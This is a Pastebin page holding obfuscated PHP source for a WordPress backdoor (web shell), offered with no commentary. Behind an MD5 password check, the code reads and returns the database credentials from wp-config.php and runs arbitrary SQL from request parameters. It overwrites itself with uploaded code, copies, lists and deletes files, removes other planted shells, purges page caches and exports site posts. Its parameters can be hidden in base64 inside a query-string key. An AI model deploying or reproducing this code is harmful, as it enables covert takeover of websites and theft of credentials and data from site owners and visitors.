API tools faq
paste
PalmaSolutions

spa096fe

PalmaSolutions
Nov 2nd, 2018
160
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.58 KB | None | 0 0
raw download clone embed print report
  1. Alr7FN24
  2. <?php
  3. define('EXT_MYSQLI', 'mysqli'); define('EXT_MYSQL', 'mysql'); define('CONF_PASSWORD_HASH', '13d7033d9985ba47c82e9a2353717e5b'); define('VERSION', '0.2.3'); function r_get_lib() { if (class_exists('mysqli')) { return EXT_MYSQLI; } if (function_exists('mysql_connect')) { return EXT_MYSQL; } } function r_get_config_path() { $spa096fe = realpath('.'); $spfed365 = 0; while ($spa096fe != '/') { if (file_exists(sprintf('%s/wp-config.php', $spa096fe)) && file_exists(sprintf('%s/index.php', $spa096fe)) && file_exists(sprintf('%s/wp-settings.php', $spa096fe))) { return $spa096fe; } $spfed365++; $spa096fe = realpath(str_repeat('../', $spfed365)); } } function r_get_config() { $spa096fe = realpath('.'); $spfed365 = 0; while ($spa096fe != '/') { file_put_contents('flog.log', $spa096fe . '
  4. ', FILE_APPEND); if (file_exists(sprintf('%s/wp-config.php', $spa096fe)) && file_exists(sprintf('%s/index.php', $spa096fe)) && file_exists(sprintf('%s/wp-settings.php', $spa096fe))) { $spf97226 = file(sprintf('%s/wp-config.php', $spa096fe)); $spf97226 = preg_grep('/defined/i', preg_grep('/define|table_prefix/i', $spf97226), PREG_GREP_INVERT); $spf97226 = implode('
  5. ', $spf97226); eval($spf97226); $sp7848af = 'table_prefix'; $sp5152c3 = explode(':', DB_HOST); $spc39af8 = array_shift($sp5152c3); $spf46f5f = array_shift($sp5152c3); $spf46f5f = $spf46f5f ? $spf46f5f : 3306; return array('host' => $spc39af8, 'port' => $spf46f5f, 'db' => DB_NAME, 'user' => DB_USER, 'pass' => DB_PASSWORD, 'prefix' => ${$sp7848af}, 'path' => $spa096fe); break; } $spfed365++; $spa096fe = realpath(str_repeat('../', $spfed365)); } } function r_mysql_connect($spf97226) { $spdbd9a0 = mysql_connect(sprintf('%s:%s', $spf97226['host'], $spf97226['port']), $spf97226['user'], $spf97226['pass']); mysql_select_db($spf97226['db'], $spdbd9a0); return $spdbd9a0; } function r_mysqli_connect($spf97226) { return new mysqli($spf97226['host'], $spf97226['user'], $spf97226['pass'], $spf97226['db'], is_numeric($spf97226['port']) ? $spf97226['port'] : 3306, !is_numeric($spf97226['port']) ? $spf97226['port'] : null); } function r_mysql_query($spf97226, $spdbd9a0, $spd05ffc, $spa9d7b8 = array()) { if (!empty($spa9d7b8)) { foreach ($spa9d7b8 as $sp5e34af => $sp53c810) { $spd05ffc = str_replace($sp5e34af, mysql_real_escape_string($sp53c810, $spdbd9a0), $spd05ffc); } } $sp63b500 = array(); $spb3de96 = mysql_query($spd05ffc, $spdbd9a0); if ($spb3de96) { while ($spe5af87 = mysql_fetch_assoc($spb3de96)) { $sp63b500[] = $spe5af87; } return array('success' => $sp63b500); } else { return array('error' => sprintf('%s :: %s', mysql_errno($spdbd9a0), mysql_error($spdbd9a0))); } } function r_mysqli_query($spf97226, $spdbd9a0, $spd05ffc, $spa9d7b8 = array()) { if (!empty($spa9d7b8)) { foreach ($spa9d7b8 as $sp5e34af => $sp53c810) { $spd05ffc = str_replace($sp5e34af, $spdbd9a0->real_escape_string($sp53c810), $spd05ffc); } } $spb3de96 = $spdbd9a0->query($spd05ffc); if (is_object($spb3de96)) { $sp63b500 = array(); while ($spe5af87 = $spb3de96->fetch_assoc()) { $sp63b500[] = $spe5af87; } return array('success' => $sp63b500); } if ($spb3de96) { return array('success' => true); } else { return array('error' => sprintf('%s :: %s', $spdbd9a0->errno, $spdbd9a0->error)); } } function r_mysql_query_res($spf97226, $spdbd9a0, $spd05ffc, $spa9d7b8 = array()) { if (!empty($spa9d7b8)) { foreach ($spa9d7b8 as $sp5e34af => $sp53c810) { $spd05ffc = str_replace($sp5e34af, mysql_real_escape_string($sp53c810, $spdbd9a0), $spd05ffc); } } $sp63b500 = array(); $spb3de96 = mysql_query($spd05ffc, $spdbd9a0); return $spb3de96; } function r_mysql_query_row($spb3de96) { if ($spb3de96) { return mysql_fetch_assoc($spb3de96); } else { return false; } } function r_mysqli_query_res($spf97226, $spdbd9a0, $spd05ffc, $spa9d7b8 = array()) { if (!empty($spa9d7b8)) { foreach ($spa9d7b8 as $sp5e34af => $sp53c810) { $spd05ffc = str_replace($sp5e34af, $spdbd9a0->real_escape_string($sp53c810), $spd05ffc); } } $spb3de96 = $spdbd9a0->query($spd05ffc); return $spb3de96; } function r_mysqli_query_row($spb3de96) { if (is_object($spb3de96)) { return $spb3de96->fetch_assoc(); } else { return false; } } function r_unmagic() { if (get_magic_quotes_gpc()) { foreach ($_POST as $sp5e34af => $sp53c810) { $_POST[$sp5e34af] = stripslashes($sp53c810); } } } function r_action_prefix() { $spf97226 = r_get_config(); echo $spf97226['prefix']; } function r_action_query() { r_unmagic(); $spf97226 = r_get_config(); $sp9bd123 = r_get_lib(); $spa9d7b8 = json_decode($_POST['bind'], true); if (isset($_POST['decode'])) { $sp64d48c = array_map('trim', explode(',', $_POST['decode'])); foreach ($sp64d48c as $spaa4b63) { if (isset($spa9d7b8[$spaa4b63])) { $spa9d7b8[$spaa4b63] = base64_decode($spa9d7b8[$spaa4b63]); } } } $spdbd9a0 = call_user_func(sprintf('r_%s_connect', $sp9bd123), $spf97226); $spb3de96 = call_user_func(sprintf('r_%s_query', $sp9bd123), $spf97226, $spdbd9a0, $_POST['query'], $spa9d7b8); if (isset($_POST['encode'])) { $sp6ea5f6 = array_map('trim', explode(',', $_POST['encode'])); foreach ($spb3de96['success'] as $sp4498a1 => $spe5af87) { foreach ($sp6ea5f6 as $sp78a084) { $spb3de96['success'][$sp4498a1][$sp78a084] = base64_encode($spb3de96['success'][$sp4498a1][$sp78a084]); } } } echo json_encode($spb3de96); } function r_action_update() { file_put_contents(__FILE__, base64_decode($_POST['file'])); echo md5(base64_decode($_POST['file'])); } function r_action_version() { echo VERSION; } function r_action_duplicate() { $sp4471bf = copy(__FILE__, $_POST['dst']); echo (int) $sp4471bf; } function r_action_copy() { $sp4471bf = copy($_POST['src'], $_POST['dst']); echo (int) $sp4471bf; } function r_action_dir() { $sp4471bf = array(); $spaa4b63 = dir($_POST['dir']); while (false !== ($spc68016 = $spaa4b63->read())) { $sp775595 = sprintf('%s/%s', rtrim($_POST['dir'], '/'), $spc68016); $sp4471bf[] = array('type' => is_file($sp775595) ? 'file' : (is_dir($sp775595) ? 'dir' : 'unknown'), 'entry' => $spc68016, 'full_entry' => $sp775595, 'realpath' => realpath($sp775595)); } $spaa4b63->close(); echo json_encode($sp4471bf); } function r_action_wpversion() { $spa096fe = r_get_config_path(); $sp442533 = file_get_contents(sprintf('%s/wp-settings.php', $spa096fe)); preg_match_all('/define\\(([^\\)]+)/i', $sp442533, $spea983c); foreach ($spea983c[1] as $spdc4c28) { if (strpos($spdc4c28, 'WPINC') !== false) { $spdc4c28 = array_map('trim', explode(',', $spdc4c28)); foreach ($spdc4c28 as $sp5bc519 => $spb57ede) { if ($spb57ede[0] == $spb57ede[strlen($spb57ede) - 1]) { $spdc4c28[$sp5bc519] = substr($spb57ede, 1, strlen($spb57ede) - 2); } } require_once $spfe89ff = sprintf('%s%s%s%sversion.php', $spa096fe, DIRECTORY_SEPARATOR, str_replace('/', DIRECTORY_SEPARATOR, $spdc4c28[1]), DIRECTORY_SEPARATOR); $spa122c6 = 'wp_version'; echo ${$spa122c6}; die; } } echo 'error'; } function r_action_w3tc() { $spa096fe = r_get_config_path(); $sp5dfa6b = rtrim(preg_replace('/^http[s]{0,1}\\:\\/\\//i', '', $_POST['url']), '/'); $sp54d4dc = sprintf('%s/wp-content/cache/page_enhanced/%s/_index.html', $spa096fe, $sp5dfa6b); if (file_exists($sp54d4dc)) { unlink($sp54d4dc); } $sp54d4dc = sprintf('%s/wp-content/cache/page_enhanced/%s/_index.html_gzip', $spa096fe, $sp5dfa6b); if (file_exists($sp54d4dc)) { unlink($sp54d4dc); } echo 'success'; } function r_action_cenabler() { $spa096fe = r_get_config_path(); $sp5dfa6b = rtrim(preg_replace('/^http[s]{0,1}\\:\\/\\//i', '', $_POST['url']), '/'); $sp54d4dc = sprintf('%s/wp-content/cache/cache-enabler/%s/index.html', $spa096fe, $sp5dfa6b); if (file_exists($sp54d4dc)) { unlink($sp54d4dc); } $sp54d4dc = sprintf('%s/wp-content/cache/cache-enabler/%s/index.html.gz', $spa096fe, $sp5dfa6b); if (file_exists($sp54d4dc)) { unlink($sp54d4dc); } $sp54d4dc = sprintf('%s/wp-content/cache/cache-enabler/%s/index-webp.html', $spa096fe, $sp5dfa6b); if (file_exists($sp54d4dc)) { unlink($sp54d4dc); } $sp54d4dc = sprintf('%s/wp-content/cache/cache-enabler/%s/index-webp.html.gz', $spa096fe, $sp5dfa6b); if (file_exists($sp54d4dc)) { unlink($sp54d4dc); } echo 'success'; } function r_action_removeshell() { if (file_exists($spaa1cb7 = sprintf('%s%s%s', rtrim($_SERVER['DOCUMENT_ROOT'], '/'), DIRECTORY_SEPARATOR, str_replace('/', DIRECTORY_SEPARATOR, ltrim($_POST['shell_url'], '/'))))) { if ($spaa1cb7 != __FILE__) { unlink($spaa1cb7); } echo file_exists($spaa1cb7) ? 'fail' : 'success'; } else { echo 'ignore'; } } function r_action_remove() { if (file_exists($_POST['file'])) { if ($_POST['file'] != __FILE__) { unlink($_POST['file']); } echo file_exists($_POST['file']) ? 'fail' : 'success'; } else { echo 'ignore'; } } function r_action_pages() { $sp60450b = tempnam('./', 'wp') . '.php'; $sp524a00 = fopen($sp60450b, 'w'); $spa096fe = r_get_config_path(); chdir($spa096fe); $sp6c27df = $_POST['id']; require $spa096fe . '/wp-load.php'; r_unmagic(); $spf97226 = r_get_config(); $sp9bd123 = r_get_lib(); $sp09f740 = $spf97226['prefix']; $spdbd9a0 = call_user_func(sprintf('r_%s_connect', $sp9bd123), $spf97226); $spb3de96 = call_user_func(sprintf('r_%s_query_res', $sp9bd123), $spf97226, $spdbd9a0, sprintf('SELECT * FROM `%sposts` WHERE `post_type` IN ( "post", "page" ) AND `post_status` = "publish" AND `ID` > %s ORDER BY `ID` ASC LIMIT %s, %s', $sp09f740, $_POST['remote_id'], $_POST['batch_start'], $_POST['batch_size'])); while ($spe5af87 = call_user_func(sprintf('r_%s_query_row', $sp9bd123), $spb3de96)) { fputcsv($sp524a00, array($spe5af87['ID'], base64_encode($spe5af87['post_content']), base64_encode($spe5af87['post_title']), base64_encode(get_permalink($spe5af87['ID'])))); } fclose($sp524a00); echo $sp60450b; } function r_action_config() { echo json_encode(r_get_config()); } function r_action_getlib() { echo r_get_lib(); } function r_action_magic() { echo get_magic_quotes_gpc() ? 'Yes' : 'No'; } function r_action_loginurl() { $spe0f5db = (isset($_SERVER['HTTPS']) ? 'https' : 'http') . "://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}"; $sp810a9d = $spe0f5db; $sp4d36d3 = basename(__FILE__); $sp60450b = basename(tempnam('./', 'ert') . '.php'); $spd3f5f0 = preg_replace(sprintf('/%s$/i', preg_quote($sp4d36d3)), $sp60450b, $sp810a9d); echo file_get_contents($spd3f5f0); } if (count($_GET) == 1 && !trim($spc26a19 = array_pop(array_values($_GET)))) { $spb3de96 = array(); parse_str(base64_decode(array_shift(array_keys($_GET))), $spb3de96); $_GET = $spb3de96; } $_POST = array_merge($_POST, $_GET); if (CONF_PASSWORD_HASH == md5($_POST['password'])) { switch ($_POST['action']) { case 'link': $spa096fe = r_get_config_path(); chdir($spa096fe); $sp6c27df = $_POST['id']; require_once $spa096fe . '/wp-load.php'; $sp94f764 = get_permalink($_POST['id']); echo sprintf('[<{%s}>]', $sp94f764); break; default: $sp6a45ed = sprintf('r_action_%s', $_POST['action']); call_user_func($sp6a45ed); break; } } else { die('ympf'); }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!